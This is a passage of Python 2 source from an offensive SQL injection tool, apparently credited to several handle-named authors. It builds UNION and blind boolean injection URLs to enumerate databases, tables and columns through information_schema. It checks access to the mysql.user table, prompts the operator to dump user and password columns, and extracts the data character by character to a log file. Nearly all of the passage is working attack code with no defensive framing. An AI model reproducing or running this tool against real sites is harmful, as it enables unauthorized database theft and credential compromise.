5004.             line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5005.             line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
5006.             count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
5007.             count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
5008.             arg_row = "Tables"
5009.         if arg_database != "None" and arg_table != "None":
5010.            
5011.             if arg_blind == "--blind":
5012.                 print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
5013.                 file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
5014.                 count_URL = site+"+and+((SELECT+COUNT(column_name)"
5015.                 count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
5016.                 line_URL = site+"+and+ascii(substring((SELECT+column_name"
5017.                 line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5018.             else:
5019.                 print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
5020.                 file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
5021.                 line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5022.                 line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5023.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5024.                 count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
5025.  
5026.  
5027.  
5028.         arg_row = "Columns"
5029.  
5030. elif mode == "--dump":                
5031.     print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
5032.     file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
5033.         print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
5034.         if arg_blind == "--blind":
5035.                 MECA = ""
5036.                 for column in arg_columns:
5037.                         MECA += column+",0x3a,"
5038.                 MECA = MECA.rstrip("0x3a,")
5039.                 count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
5040.                 line_URL = site+"+and+ascii(substring((SELECT+concat("+MECA+")+FROM+"+arg_database+"."+arg_table
5041.         else:
5042.                 for column in arg_columns:
5043.                         MECA += column+",0x1e,"
5044.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
5045.                 line_URL = site.replace("MECA",MECA+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
5046.         if arg_where != "" or arg_orderby != "":
5047.                 if arg_where != "":
5048.                         arg_where = arg_where.split(",")
5049.                         print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
5050.                         arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
5051.                 if arg_orderby != "":
5052.                         arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
5053.                         print "[+] ORDERBY clause:",arg_orderby
5054.                 count_URL += "+"+arg_where
5055.                 line_URL += "+"+arg_where+"+"+arg_orderby
5056.         if version[0] == 4:
5057.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
5058.             line_URL = site.replace("MECA",MECA+"0x1e,0x20)")+"+FROM+"+arg_table
5059.  
5060. elif mode == "--full":
5061.     print "[+] Starting full SQLi information_schema enumeration..."
5062.     line_URL = site.replace("MECA","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
5063.     line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
5064.         count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5065.         count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
5066.        
5067. elif mode == "--dbs":
5068.     print "[+] Showing all databases current user has access too!"
5069.     file.write("\n[+] Showing all databases current user has access too!")
5070.         if arg_blind == "--blind":
5071.                 count_URL = site+"+and+((SELECT+COUNT(schema_name)"
5072.                 count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
5073.                 line_URL = site+"+and+ascii(substring((SELECT+schema_name"
5074.                 line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
5075.         else:
5076.                 count_URL = site.replace("MECA","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
5077.                 count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
5078.                 line_URL = site.replace("MECA","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
5079.                 line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
5080.     arg_row = "Databases"
5081.  
5082. if arg_blind == "--blind":
5083.         count_URL+="))"
5084.         line_URL+="+LIMIT+"
5085. else:
5086.         count_URL += arg_end
5087.         line_URL += "+LIMIT+NUM,1"+arg_end
5088.        
5089. ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
5090. if mode == "--info" and arg_blind == "--blind":
5091.         head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
5092.         source = GetThatShit(head_URL)
5093.         match = re.findall(arg_string,source)
5094.         if len(match) >= 1:
5095.                 yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
5096.         else:
5097.                 yesno = "NO"
5098.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
5099.         print "\n[+] Showing database version, username@location, and database name!"
5100.     file.write("\n\n[+] Showing database version, username@location, and database name!")
5101.     line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
5102.         row_value = 1
5103.  
5104. if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
5105.         if arg_blind == "--blind":
5106.                 row_value = GuessValue(count_URL)
5107.         else:
5108.                 source = GetThatShit(count_URL)
5109.                 match = re.findall("\x1e\x1e\S+",source)
5110.                 match = match[0][2:].split("\x1e")
5111.                 row_value = match[0]
5112.         print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
5113.  
5114. if arg_blind == "--union":
5115.         if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
5116.                 while int(table_num) != int(row_value):
5117.                         try:
5118.                                 source = GetThatShit(line_URL.replace("NUM",str(num)))
5119.                                 match = re.findall("\x1e\x1e\S+",source)
5120.                                 if len(match) >= 1:
5121.                                         if mode == "--schema" or mode == "--full":
5122.                                                 match = match[0][2:].split("\x1e")
5123.                                                 if cur_db != match[0]:         
5124.                                                         cur_db = match[0]
5125.                                                         if table_num == 0:
5126.                                                                 print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
5127.                                                         else:
5128.                                                                 print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
5129.                                                         print "  [Table] >>> \n  ------------- \n\t[Columns]";file.write("[Table: Columns]\n")
5130.                                                 if cur_table != match[1]:
5131.                                                         print "\n\n "+match[1]+" >>>\n ---------------------"+"\n\t"+match[2],
5132.                                                        
5133.                                                         file.write("\n\n["+str(table_num+1)+"]"+match[1]+" >>>\n ---------------------"+"\n\t"+match[2])
5134.                                                        
5135.                                                         cur_table = match[1]
5136.                                                        
5137.                                                         table_num = int(table_num) + 1
5138.                                                 else:
5139.                                                         sys.stdout.write("\n\t%s" % (match[2]))
5140.                                                         file.write("\n\t"+match[2])
5141.                                                         sys.stdout.flush()
5142.                                        
5143.                                         elif mode == "--dbs":                                        
5144.                                                 match = match[0]
5145.                                                 if table_num == 0:
5146.                                                         print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
5147.                                                 else:
5148.                                                         print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
5149.                                                 table_num+=1
5150.                                        
5151.                                         elif mode == "--dump":
5152.                                                 match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
5153.                                                 if match == []:
5154.                                                         match = ['']
5155.                                                 else:
5156.                                                         match = match[0].strip("\x1e").split("\x1e")
5157.                                                 if arg_rowdisp == 1:
5158.                                                         print '\n\n--------------------'  ;file.write( '\n\n--------------------' )    
5159.                                                         print "  Row  Number "+str(num+1)+" >>>", ;file.write(" Row  Number "+str(num+1)+" :",)
5160.                                                         print '\n--------------------\n\n' ;file.write( '\n--------------------\n\n')    
5161.                                                 else:
5162.                                                         print;file.write("\n")
5163.                                                
5164.                                                 for ddata in match:
5165.                                                         if '>' in ddata  or '<' in ddata :
5166.                                                             match.remove(ddata)
5167.                                                        
5168.                                                 for ddata in match:
5169.                                                         if ddata == '' :
5170.                                                             match.remove(ddata)          
5171.                                                 RebelGhost(match)        
5172.                                                 Gh = 0      
5173.                                                 for ddata in See:
5174.                                                         if ddata == '' :
5175.                                                             See.remove(ddata)        
5176.                                                 while Gh<len(See):      
5177.                                                         print '\t==============================================================='  ;file.write('\n===============================================================\n')      
5178.                                                        
5179.                                                         print '\t    '+arg_columns[Gh]+' >>> '+See[Gh]    ;file.write('  '+arg_columns[Gh]+' >>> '+See[Gh])
5180.                                                        
5181.                                                         print '\t==============================================================='; file.write('\n===============================================================\n')        
5182.                                                        
5183.                                                         sys.stdout.flush()
5184.                                                         Gh = Gh+1
5185.                                                 table_num+=1
5186.                                 else:
5187.                                         if mode == "--dump":
5188.                                                 table_num+=1
5189.                                                 sys.stdout.write("\n[%s] No data" % (num))
5190.                                                 file.write("\n[%s] No data" % (num))
5191.                                         break
5192.                                 num+=1
5193.                         except (KeyboardInterrupt, SystemExit):
5194.                                 raise
5195.                         except:
5196.                                 pass
5197.  
5198.  
5199. if arg_blind == "--blind":
5200.         if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
5201.                 lower_bound = 0
5202.                 upper_bound = 127
5203.                 print
5204.                 for data_row in range(int(num), row_value):
5205.                         sys.stdout.write("[%s]: " % (lim_num))
5206.                         file.write("\n[%s]: " % (lim_num))
5207.                         sys.stdout.flush()
5208.                         value = chr(upper_bound)
5209.                         while value != chr(0):
5210.                                 if mode == "--info":   
5211.                                         Guess_URL = line_URL + str(let_pos)+",1))"
5212.                                 else:
5213.                                         Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
5214.                                 value = chr(GuessValue(Guess_URL))
5215.                                 sys.stdout.write("%s" % (value))
5216.                                 file.write(value)
5217.                                 sys.stdout.flush()
5218.                                 let_pos+=1
5219.                         print
5220.                         lim_num = int(lim_num) + 1
5221.                         let_pos = 1
5222.                         data_row+=1
5223.  
5224.  
5225.  
5226.  
5227. print "\n\n[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
5228. print "[-] Job Done ^_^\n";file.write("\n[-] Job Done ^_^\n")
5229.  
5230.  
5231. print '=============================================================='
5232. print '^_^ Coded By Cynical, AnXieTy, Vandal, PluTo ^_^ '
5233. print '              [-]--- Job Finished --- [-]'
5234. file.close()